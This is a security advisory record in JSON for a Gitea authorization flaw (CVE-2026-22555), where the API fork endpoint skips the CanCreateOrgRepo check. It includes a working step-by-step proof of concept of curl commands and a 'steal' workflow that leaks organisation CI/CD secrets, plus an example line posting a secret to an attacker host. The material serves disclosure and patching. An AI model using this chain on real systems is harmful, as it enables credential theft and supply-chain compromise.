{"id":"CVE-2026-22555","title":"Gitea: API Fork Missing CanCreateOrgRepo Check Allows Org Secret Exfiltration","summary":"Gitea: API Fork Missing CanCreateOrgRepo Check Allows Org Secret Exfiltration","severity":"high","cvss":8.1,"cwe":["CWE-863"],"vendor":"gitea","product":"code.gitea.io/gitea","ecosystem":"go","affected":["code.gitea.io/gitea < 1.26.0"],"patched":["code.gitea.io/gitea 1.26.0"],"published":"2026-06-17","updated":"2026-06-17","source":"GHSA","sourceUrl":"https://github.com/advisories/GHSA-fhx7-m96w-mv29","references":[{"url":"https://github.com/go-gitea/gitea/security/advisories/GHSA-fhx7-m96w-mv29"},{"url":"https://github.com/advisories/GHSA-fhx7-m96w-mv29"}],"tags":["ghsa","go"],"ingestedAt":"2026-06-29T14:31:47.226Z","epss":0.00426,"epssPercentile":0.36404,"slug":"CVE-2026-22555","body":"## Overview\n\n## Summary\n\nThe API endpoint `POST /api/v1/repos/{owner}/{repo}/forks` only checks `IsOrgMember()` when a user forks a repository into an organization, but does not check `CanCreateOrgRepo()`. The web UI fork handler correctly checks both. This allows a read-only organization member — in a team with `can_create_org_repo=false` — to create repositories in the organization namespace via the API. The attacker receives full admin permissions on the forked repository, can enable Actions, push arbitrary workflow files, and exfiltrate all organization-level CI/CD secrets (deploy keys, cloud credentials, API tokens) through the runner infrastructure.\n\n## Steps To Reproduce\n\n### 1. Environment setup\n\nStart a Gitea instance with Actions enabled:\n\n```bash\n# docker-compose.yml\ncat > docker-compose.yml << 'EOF'\nversion: '3'\nservices:\n  gitea:\n    image: gitea/gitea:1.23\n    container_name: gitea-poc\n    ports:\n      - \"3000:3000\"\n    volumes:\n      - gitea-data:/data\n    environment:\n      - GITEA__database__DB_TYPE=sqlite3\n      - GITEA__server__ROOT_URL=http://localhost:3000/\n      - GITEA__security__INSTALL_LOCK=true\n      - GITEA__actions__ENABLED=true\nvolumes:\n  gitea-data:\nEOF\n\ndocker compose up -d\n# Wait for startup\nsleep 15\n\n# Create admin user\ndocker exec -u git gitea-poc gitea admin user create \\\n  --admin --username admin --password 'Admin1234!' \\\n  --email admin@example.com --must-change-password=false\n```\n\n### 2. Create the target environment (as admin)\n\n```bash\n# Get admin token\nADMIN_TOKEN=$(curl -s -X POST \"http://localhost:3000/api/v1/users/admin/tokens\" \\\n  -u \"admin:Admin1234!\" -H \"Content-Type: application/json\" \\\n  -d '{\"name\": \"setup\", \"scopes\": [\"all\"]}' | python3 -c \"import sys,json; print(json.load(sys.stdin)['sha1'])\")\n\n# Create attacker user\ncurl -s -X POST \"http://localhost:3000/api/v1/admin/users\" \\\n  -H \"Authorization: token $ADMIN_TOKEN\" -H \"Content-Type: application/json\" \\\n  -d '{\"username\":\"attacker\",\"password\":\"Attacker123!\",\"email\":\"attacker@example.com\",\"must_change_password\":false}'\n\n# Create organization\ncurl -s -X POST \"http://localhost:3000/api/v1/orgs\" \\\n  -H \"Authorization: token $ADMIN_TOKEN\" -H \"Content-Type: application/json\" \\\n  -d '{\"username\":\"target-org\",\"visibility\":\"public\"}'\n\n# Create a source repository in the org\ncurl -s -X POST \"http://localhost:3000/api/v1/orgs/target-org/repos\" \\\n  -H \"Authorization: token $ADMIN_TOKEN\" -H \"Content-Type: application/json\" \\\n  -d '{\"name\":\"source-repo\",\"auto_init\":true}'\n\n# Create a read-only team with can_create_org_repo=false\nTEAM_ID=$(curl -s -X POST \"http://localhost:3000/api/v1/orgs/target-org/teams\" \\\n  -H \"Authorization: token $ADMIN_TOKEN\" -H \"Content-Type: application/json\" \\\n  -d '{\"name\":\"readonly-team\",\"permission\":\"read\",\"can_create_org_repo\":false,\"units\":[\"repo.code\",\"repo.issues\"]}' \\\n  | python3 -c \"import sys,json; print(json.load(sys.stdin)['id'])\")\n\n# Add attacker to the read-only team\ncurl -s -X PUT \"http://localhost:3000/api/v1/teams/$TEAM_ID/members/attacker\" \\\n  -H \"Authorization: token $ADMIN_TOKEN\"\n\n# Add source-repo to the team so attacker can read it\ncurl -s -X PUT \"http://localhost:3000/api/v1/teams/$TEAM_ID/repos/target-org/source-repo\" \\\n  -H \"Authorization: token $ADMIN_TOKEN\"\n\n# Create organization secrets (simulating real CI/CD credentials)\ncurl -s -X PUT \"http://localhost:3000/api/v1/orgs/target-org/actions/secrets/DEPLOY_KEY\" \\\n  -H \"Authorization: token $ADMIN_TOKEN\" -H \"Content-Type: application/json\" \\\n  -d '{\"data\":\"sk-live-test-deploy-key-1234567890abcd\"}'\n\ncurl -s -X PUT \"http://localhost:3000/api/v1/orgs/target-org/actions/secrets/AWS_ACCESS_KEY\" \\\n  -H \"Authorization: token $ADMIN_TOKEN\" -H \"Content-Type: application/json\" \\\n  -d '{\"data\":\"AKIAIOSFODNN7EXAMPLE\"}'\n\ncurl -s -X PUT \"http://localhost:3000/api/v1/orgs/target-org/actions/secrets/AWS_SECRET_KEY\" \\\n  -H \"Authorization: token $ADMIN_TOKEN\" -H \"Content-Type: application/json\" \\\n  -d '{\"data\":\"wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\"}'\n```\n\n### 3. Register an Actions runner\n\n```bash\n# Get runner registration token\nREG_TOKEN=$(docker exec -u git gitea-poc gitea actions generate-runner-token)\n\n# Start act_runner (adjust network name if needed)\nNETWORK=$(docker inspect gitea-poc --format '{{range $key, $val := .NetworkSettings.Networks}}{{$key}}{{end}}')\ndocker run -d --name act-runner --network \"$NETWORK\" \\\n  -e GITEA_INSTANCE_URL=http://gitea-poc:3000 \\\n  -e GITEA_RUNNER_REGISTRATION_TOKEN=\"$REG_TOKEN\" \\\n  -e GITEA_RUNNER_LABELS=ubuntu-latest:docker://node:20-bookworm \\\n  -v /var/run/docker.sock:/var/run/docker.sock \\\n  gitea/act_runner:latest\n\n# Wait for runner registration\nsleep 15\n```\n\n### 4. Verify attacker CANNOT create repos in the org (expected: 403)\n\n```bash\n# Get attacker token\nATTACKER_TOKEN=$(curl -s -X POST \"http://localhost:3000/api/v1/users/attacker/tokens\" \\\n  -u \"attacker:Attacker123!\" -H \"Content-Type: application/json\" \\\n  -d '{\"name\": \"poc\", \"scopes\": [\"all\"]}' | python3 -c \"import sys,json; print(json.load(sys.stdin)['sha1'])\")\n\n# Try creating a repo directly — should fail\ncurl -s -o /dev/null -w \"Direct repo creation: HTTP %{http_code}\\n\" \\\n  -X POST \"http://localhost:3000/api/v1/orgs/target-org/repos\" \\\n  -H \"Authorization: token $ATTACKER_TOKEN\" -H \"Content-Type: application/json\" \\\n  -d '{\"name\":\"should-fail\",\"auto_init\":true}'\n# Expected output: Direct repo creation: HTTP 403\n\n# Verify attacker cannot access org secrets via API\ncurl -s -o /dev/null -w \"Access org secrets: HTTP %{http_code}\\n\" \\\n  \"http://localhost:3000/api/v1/orgs/target-org/actions/secrets\" \\\n  -H \"Authorization: token $ATTACKER_TOKEN\"\n# Expected output: Access org secrets: HTTP 403\n```\n\n### 5. Exploit: Fork into the org via API (THE BYPASS)\n\n```bash\n# Fork the source repo into the org — this should also fail but doesn't\nFORK_RESULT=$(curl -s -X POST \\\n  \"http://localhost:3000/api/v1/repos/target-org/source-repo/forks\" \\\n  -H \"Authorization: token $ATTACKER_TOKEN\" -H \"Content-Type: application/json\" \\\n  -d '{\"organization\":\"target-org\",\"name\":\"evil-fork\"}')\n\necho \"$FORK_RESULT\" | python3 -c \"\nimport sys,json\nd = json.load(sys.stdin)\nprint(f'Fork created: {d[\\\"full_name\\\"]}')\nprint(f'Permissions: admin={d[\\\"permissions\\\"][\\\"admin\\\"]}, push={d[\\\"permissions\\\"][\\\"push\\\"]}')\n\"\n# Expected output:\n#   Fork created: target-org/evil-fork\n#   Permissions: admin=True, push=True\n```\n\nThe attacker now has admin+push access to an org-owned repository, despite being in a team with `can_create_org_repo=false`.\n\n### 6. Enable Actions and push exfiltration workflow\n\n```bash\n# Enable Actions on the fork\ncurl -s -X PATCH \"http://localhost:3000/api/v1/repos/target-org/evil-fork\" \\\n  -H \"Authorization: token $ATTACKER_TOKEN\" -H \"Content-Type: application/json\" \\\n  -d '{\"has_actions\":true}'\n\n# Push a workflow that references org secrets\nWORKFLOW=$(cat << 'WFEOF'\nname: exfiltrate\non: [push]\njobs:\n  steal:\n    runs-on: ubuntu-latest\n    steps:\n      - name: Leak org secrets\n        env:\n          DEPLOY_KEY: ${{ secrets.DEPLOY_KEY }}\n          AWS_ACCESS_KEY: ${{ secrets.AWS_ACCESS_KEY }}\n          AWS_SECRET_KEY: ${{ secrets.AWS_SECRET_KEY }}\n        run: |\n          echo \"=== SECRET EXFILTRATION ===\"\n          echo \"DEPLOY_KEY length: ${#DEPLOY_KEY}\"\n          echo \"AWS_ACCESS_KEY length: ${#AWS_ACCESS_KEY}\"\n          echo \"AWS_SECRET_KEY length: ${#AWS_SECRET_KEY}\"\n          echo \"DEPLOY_KEY prefix: ${DEPLOY_KEY:0:4}...\"\n          echo \"AWS_ACCESS_KEY prefix: ${AWS_ACCESS_KEY:0:4}...\"\n          echo \"AWS_SECRET_KEY prefix: ${AWS_SECRET_KEY:0:4}...\"\n          echo \"=== END EXFILTRATION ===\"\nWFEOF\n)\n\ncurl -s -X POST \\\n  \"http://localhost:3000/api/v1/repos/target-org/evil-fork/contents/.gitea/workflows/steal.yml\" \\\n  -H \"Authorization: token $ATTACKER_TOKEN\" -H \"Content-Type: application/json\" \\\n  -d \"{\\\"content\\\":\\\"$(echo -n \"$WORKFLOW\" | base64 -w0)\\\",\\\"message\\\":\\\"add CI\\\"}\"\n```\n\n### 7. Verify secret exfiltration\n\n```bash\n# Wait for the runner to execute the workflow (60-120 seconds)\nsleep 90\n\n# Check the Actions run page in browser or via API:\necho \"View results at: http://localhost:3000/target-org/evil-fork/actions\"\n```\n\nExpected output in the workflow logs:\n```\n=== SECRET EXFILTRATION ===\nDEPLOY_KEY length: 37\nAWS_ACCESS_KEY length: 20\nAWS_SECRET_KEY length: 40\nDEPLOY_KEY prefix: sk-l...\nAWS_ACCESS_KEY prefix: AKIA...\nAWS_SECRET_KEY prefix: wJal...\n=== END EXFILTRATION ===\n```\n\nAll three organization-level secrets are accessible to the attacker's workflow. In a real attack, the workflow would exfiltrate secrets to an attacker-controlled endpoint (e.g., `curl -d \"$SECRET\" https://attacker.example.com/collect`).\n\n## Impact\n\nA read-only organization member — with no repository creation rights (`can_create_org_repo=false`) — can exfiltrate all organization-level CI/CD secrets by exploiting a missing authorization check in the API fork endpoint. The web UI correctly enforces the `CanCreateOrgRepo` permission, but the API does not, creating a classic API-vs-web authorization inconsistency.\n\nThe attack chain is: (1) fork an existing org repo back into the same org via the API, bypassing the `CanCreateOrgRepo` check; (2) receive admin permissions on the fork as its creator; (3) enable Actions and push a workflow that references org secrets; (4) the org's runner picks up the job (runners match on `repository.owner_id`), and org secrets are injected into the workflow environment (fetched by `Repo.OwnerID`); (5) the workflow exfiltrates all org secrets.\n\nOrganization secrets commonly include deploy keys, cloud credentials (AWS IAM keys, GCP service accounts), container registry tokens, and personal access tokens with broad scope. Stolen credentials enable lateral movement to cloud infrastructure, private repositories, and external services far beyond the Gitea instance itself. The attacker can also push arbitrary code under the organization's trusted namespace, creating supply chain risk for downstream consumers.\n\nThis is particularly dangerous because organizations commonly use read-only teams for auditors, reviewers, contractors, or new employees — precisely the users who should NOT have access to production secrets.\n\n\n## Supporting Material/References\n\n  * **poc-fork-authz-bypass.zip** — ZIP archive containing the full exploit script and README\n  * Vulnerable code — API fork handler (missing `CanCreateOrgRepo` check):\n    https://github.com/go-gitea/gitea/blob/79f96b3e24/routers/api/v1/repo/fork.go#L135-L144\n  * Correct code — Web fork handler (has `CanCreateOrgRepo` check):\n    https://github.com/go-gitea/gitea/blob/79f96b3e24/routers/web/repo/fork.go#L181-L189\n  * Runner task assignment (matches on `owner_id`):\n    https://github.com/go-gitea/gitea/blob/79f96b3e24/models/actions/task.go#L245-L248\n  * Secret injection (fetches by `Repo.OwnerID`):\n    https://github.com/go-gitea/gitea/blob/79f96b3e24/models/secret/secret.go#L167\n  * Fork creator gets admin permissions:\n    https://github.com/go-gitea/gitea/blob/79f96b3e24/services/repository/create.go#L433-L440\n  * Related fix: PR #34031 fixed a similar bypass via repo transfers, confirming this class of authorization inconsistency is treated as a vulnerability\n  * OWASP API Security Top 10 2023: API5 — Broken Function Level Authorization\n  * OWASP Top 10 2021: A01 — Broken Access Control\n\n\n[poc-fork-authz-bypass.zip](https://github.com/user-attachments/files/26129318/poc-fork-authz-bypass.zip)\n\n## Affected packages\n\n- `code.gitea.io/gitea < 1.26.0`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `code.gitea.io/gitea 1.26.0`","depth":"twilight","depthScore":45,"depthScoreParts":{"impact":44.6,"likelihood":0.1,"exploitation":0,"ransomware":0},"changes":[]}